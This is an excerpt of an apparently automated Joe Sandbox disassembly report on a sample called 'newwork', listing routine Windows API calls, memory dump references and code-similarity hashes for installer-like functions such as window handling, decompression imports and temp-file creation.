                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                • API String ID: 2948443157-222967699
                                                                                • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                APIs
                                                                                • GetCursorPos.USER32 ref: 004233AF
                                                                                • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                • SetCursor.USER32(00000000), ref: 00423413
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                • String ID:
                                                                                • API String ID: 1770779139-0
                                                                                • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                • API String ID: 667068680-2254406584
                                                                                • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                • API String ID: 190572456-212574377
                                                                                • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                  • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                  • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                  • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                • API String ID: 142928637-2676053874
                                                                                • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                • API String ID: 2238633743-1050967733
                                                                                • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                • API String ID: 667068680-222143506
                                                                                • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041B57E
                                                                                • GetDC.USER32(?), ref: 0041B58A
                                                                                • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                • String ID:
                                                                                • API String ID: 2502006586-0
                                                                                • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                APIs
                                                                                • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                • API String ID: 1452528299-1580325520
                                                                                • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDeviceMetricsSystem$Release
                                                                                • String ID:
                                                                                • API String ID: 447804332-0
                                                                                • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                • LocalFree.KERNEL32(0081E4B0,00000000,00401B68), ref: 00401ACF
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,0081E4B0,00000000,00401B68), ref: 00401AEE
                                                                                • LocalFree.KERNEL32(0081F4B0,?,00000000,00008000,0081E4B0,00000000,00401B68), ref: 00401B2D
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID:
                                                                                • API String ID: 3782394904-0
                                                                                • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$Show
                                                                                • String ID:
                                                                                • API String ID: 3609083571-0
                                                                                • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                APIs
                                                                                  • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                • String ID:
                                                                                • API String ID: 3527656728-0
                                                                                • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID: !nI$.tmp$_iu
                                                                                • API String ID: 3498533004-584216493
                                                                                • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                APIs
                                                                                  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                  • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                • String ID: .dat$.msg$IMsg$Uninstall
                                                                                • API String ID: 3312786188-1660910688
                                                                                • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
